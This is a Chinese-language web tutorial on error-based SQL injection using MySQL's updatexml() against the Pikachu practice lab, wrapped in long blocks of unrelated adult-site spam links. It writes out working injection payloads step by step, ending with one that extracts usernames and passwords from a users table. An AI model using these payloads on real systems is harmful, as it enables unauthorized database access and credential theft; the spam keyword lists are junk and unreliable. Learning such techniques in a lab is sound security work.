成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

詳解SQL報(bào)錯(cuò)盲注

瀏覽:133日期:2023-03-06 14:25:14
目錄
  • 一、SQL報(bào)錯(cuò)函數(shù)詳解
  • 二、SQL報(bào)錯(cuò)盲注payload構(gòu)造
    • 1、updatexml語(yǔ)句構(gòu)造思路
    • 2、查詢當(dāng)前數(shù)據(jù)庫(kù)
    • 3、查詢表名
    • 4、查詢列名
    • 5、查詢字段名
    • 6、查詢數(shù)據(jù)

今天繼續(xù)給大家介紹Linux運(yùn)維相關(guān)知識(shí),本文主要內(nèi)容是SQL報(bào)錯(cuò)盲注詳解。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!

一、SQL報(bào)錯(cuò)函數(shù)詳解

updatexml();floor();extractvalue();等函數(shù)都可以用于構(gòu)造SQL報(bào)錯(cuò)函數(shù),今天我們主要來(lái)講解使用updatexml()函數(shù)。
updatexml()函數(shù)使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱(chēng),XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數(shù)據(jù)。
該函數(shù)有一個(gè)特性,即如果XPath_string不是XPath格式的字符串,就會(huì)報(bào)錯(cuò)并顯示處XPath的值,因此,我們可以利用這一特性實(shí)現(xiàn)SQL報(bào)錯(cuò)盲注。此外,我們還可以利用updatexml()函數(shù)的特性,實(shí)現(xiàn)在SQL插入、刪除等語(yǔ)句中的SQL注入。

二、SQL報(bào)錯(cuò)盲注payload構(gòu)造

1、updatexml語(yǔ)句構(gòu)造思路

updatexml()函數(shù)的構(gòu)造,首先需要閉合SQL語(yǔ)句中的冒號(hào)、括號(hào)。其次還需要使用and或者or語(yǔ)句連接成一個(gè)單獨(dú)的語(yǔ)句,這樣即可成功執(zhí)行updatexml()函數(shù)中的語(yǔ)句。
下面,我以皮卡丘靶場(chǎng)為例,來(lái)簡(jiǎn)單介紹一下updatexml報(bào)錯(cuò)注入payload的構(gòu)造思路,皮卡丘靶場(chǎng)SQL insert/update型注入頁(yè)面如下所示:

從上圖中可以看出,該頁(yè)面功能上是提供人員的注冊(cè),因此可以猜測(cè)其內(nèi)部是insert類(lèi)型的SQL語(yǔ)句,因此我們可以在手機(jī)、住址等列(一般不要選擇密碼,因?yàn)楹芏嗑W(wǎng)站都會(huì)把密碼進(jìn)行md5處理,從而導(dǎo)致我們的updatexml失效)中插入我們的updatexml語(yǔ)句。通過(guò)簡(jiǎn)單的實(shí)驗(yàn)可以得知,該站點(diǎn)的注入閉合為單引號(hào),因此payload的構(gòu)造格式為:

12" or updatexml() or"

2、查詢當(dāng)前數(shù)據(jù)庫(kù)

當(dāng)我們確定updatexml()函數(shù)的格式后,我們就可以寫(xiě)實(shí)際的payload語(yǔ)句了,相關(guān)命令如下所示:

12"or updatexml(1,concat(0x7e,database(),0x7e),0) or"

從上payload可以看出,updatexml()函數(shù)有三部分組成,我們需要把我們要執(zhí)行的SQL語(yǔ)句寫(xiě)到第二部分,第二部分是一個(gè)concat()函數(shù),之所以要拼接0x7e是因?yàn)樵?6進(jìn)制字符是一個(gè)波浪線,也可以換成其他的字符。
該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們當(dāng)前的數(shù)據(jù)庫(kù)名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or "

在上述payload中,concat中間的SQL語(yǔ)句要用括號(hào)括起來(lái),然后寫(xiě)入正常的查詢命令即可,該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們查詢到當(dāng)前數(shù)據(jù)庫(kù)存在一個(gè)名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e),0) or "

該payload構(gòu)造原理與以上類(lèi)似,執(zhí)行結(jié)果如下所示:

5、查詢字段名

字段名查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="pikachu"),0x7e),0) or "

該payload構(gòu)造原理與以上類(lèi)似,執(zhí)行結(jié)果如下所示:

6、查詢數(shù)據(jù)

數(shù)據(jù)查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select concat(username,"-",password) from users limit 0,1),0x7e),0) or "

該payload構(gòu)造原理與以上類(lèi)似,執(zhí)行結(jié)果如下所示:

到此這篇關(guān)于SQL報(bào)錯(cuò)盲注詳解的文章就介紹到這了,更多相關(guān)SQL報(bào)錯(cuò)盲注內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: MsSQL
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
久久激情婷婷| 成人深夜福利app| 看片网站欧美日韩| 亚洲伦理精品| 久久久久久一级片| 成人av片在线观看| 欧美一级欧美三级在线观看| 蜜桃视频一区二区三区| 亚洲综合小说图片| 欧美岛国在线观看| 国产欧美日韩一区| 成人开心网精品视频| 五月婷婷综合网| 久久人人超碰精品| 欧美在线视频日韩| 精久久久久久| www.欧美日韩| 日韩av在线发布| 欧美韩国一区二区| 日韩欧美国产综合一区 | 亚洲激情午夜| 懂色av一区二区在线播放| 亚洲美女免费在线| 久久色.com| 欧美高清www午色夜在线视频| 老鸭窝91久久精品色噜噜导演| 欧美激情第二页| 成人丝袜18视频在线观看| 秋霞午夜av一区二区三区| 亚洲免费资源在线播放| 2020日本不卡一区二区视频| 在线播放91灌醉迷j高跟美女| 一区二区三区精品国产| 亚洲国产婷婷| 亚洲高清免费| 亚洲黄色精品| 狠狠爱www人成狠狠爱综合网| 波多野结衣一区二区三区| 美女网站色91| 日韩在线一二三区| 亚瑟在线精品视频| 亚洲国产视频一区| 一区二区三区中文字幕在线观看| 国产精品进线69影院| 国产日韩欧美精品一区| 久久久国产一区二区三区四区小说| 欧美一级久久久| 欧美一区二区视频在线观看2020 | 亚洲区一区二| 一区二区三区免费看| 国产女主播一区二区三区| 亚洲一区精彩视频| 香蕉久久国产| 色婷婷综合五月| 91精品国产91久久久久久一区二区 | 全国精品久久少妇| 欧美aa在线视频| 国产福利91精品一区二区三区| 国产成人午夜电影网| 成人性生交大片免费看中文网站| 粉嫩aⅴ一区二区三区四区| 91影院在线观看| 影音先锋久久| 久久精品成人| 911国产精品| 精品盗摄一区二区三区| 国产欧美一区二区三区鸳鸯浴| 精品欧美一区二区在线观看 | av激情成人网| 欧美日韩国产亚洲一区| 亚洲精品久久久久久一区二区| 国产视频一区三区| 欧美最猛性xxxxx直播| 欧美日韩国产成人在线免费| 日韩欧美区一区二| 亚洲美女电影在线| 蜜臀av性久久久久蜜臀aⅴ| 成人免费毛片a| 国产日韩欧美高清免费| 欧美在线观看视频一区二区| 日韩一区二区三区视频| 中文字幕一区视频| 亚洲午夜三级在线| 国产精品一区二区久激情瑜伽 | 91精品福利在线一区二区三区| 国产精品美女久久久久久久久久久| 亚洲国产成人av网| 国产不卡视频在线观看| 亚洲人www| 日韩美女在线视频| 亚洲五码中文字幕| av中文字幕亚洲| 久久综合九九| 久久精品日韩一区二区三区| 亚洲va韩国va欧美va精品| 成人三级在线视频| 国产欧美欧美| 精品国产a毛片| 午夜私人影院久久久久| 91在线免费播放| 性欧美videos另类喷潮| 26uuu色噜噜精品一区二区| 午夜精品久久久久久久99水蜜桃 | 欧美系列亚洲系列| 国产欧美久久久精品影院 | 亚洲免费在线精品一区| 久久免费美女视频| 麻豆精品在线看| 亚洲精品综合| 精品少妇一区二区三区日产乱码| 亚洲国产中文字幕| 亚洲手机视频| 精品国产一区二区三区四区四| 石原莉奈在线亚洲三区| 一区国产精品| 久久综合狠狠综合| 久久99久久久久| 久久久亚洲人| 一区二区三区免费看视频| 欧美一区成人| 久久综合九色综合欧美98| 国产精品香蕉一区二区三区| 欧美三区在线视频| 麻豆一区二区在线| 亚洲在线不卡| 亚洲精品成人少妇| 女人天堂亚洲aⅴ在线观看| 日韩一区二区三区观看| 久久精品国产99| 亚洲在线黄色| 亚洲伦在线观看| 国产一区清纯| 亚洲欧洲一区二区三区| 99久久精品情趣| 91麻豆精品久久久久蜜臀 | 免费视频一区| 亚洲一区二区三区自拍| 在线观看亚洲| 国产精品国产a级| 欧美 亚欧 日韩视频在线| 日韩欧美一级精品久久| 国产精品综合av一区二区国产馆| 欧美亚洲专区| 日韩电影一区二区三区| 久久综合伊人| 蜜桃av一区二区在线观看| 久久亚洲电影| 麻豆91精品视频| 91黄色激情网站| 黄色精品一二区| 欧美一区二区免费视频| 国产精品99久久不卡二区| 欧美日韩高清在线播放| 国产一区在线精品| 精品国产伦一区二区三区观看体验 | 日本一不卡视频| 欧美日韩一区二区三区不卡| 国产成人免费网站| 久久午夜电影网| 伊人久久婷婷| 午夜天堂影视香蕉久久| 欧美日韩免费不卡视频一区二区三区| 狠狠色综合日日| 国产亚洲欧美日韩在线一区| 激情六月综合| 日韩电影在线一区二区| 欧美探花视频资源| 9色porny自拍视频一区二区| 18欧美乱大交hd1984| 性久久久久久| 寂寞少妇一区二区三区| 2023国产精品| 国产视频一区在线观看一区免费| 日韩极品在线观看| 884aa四虎影成人精品一区| 欧美jizzhd精品欧美喷水 | 色综合色综合色综合色综合色综合 | 国产精品久久二区二区| 久久亚洲色图| 成人免费毛片a| 亚洲男人的天堂在线观看| 久久精选视频| 懂色av中文一区二区三区| 国产精品毛片久久久久久| 欧美专区日韩专区| bt7086福利一区国产| 亚洲视频精选在线| 欧美男男青年gay1069videost| 99精品欧美一区二区三区综合在线| 亚洲精选在线视频| 欧美不卡在线视频| 久久久综合香蕉尹人综合网| 99国产精品久久久久| 视频一区中文字幕国产| 欧美激情一区二区三区在线| 欧美专区亚洲专区| 好吊一区二区三区| 高清国产午夜精品久久久久久| 一区二区三区在线免费播放| 欧美成人video|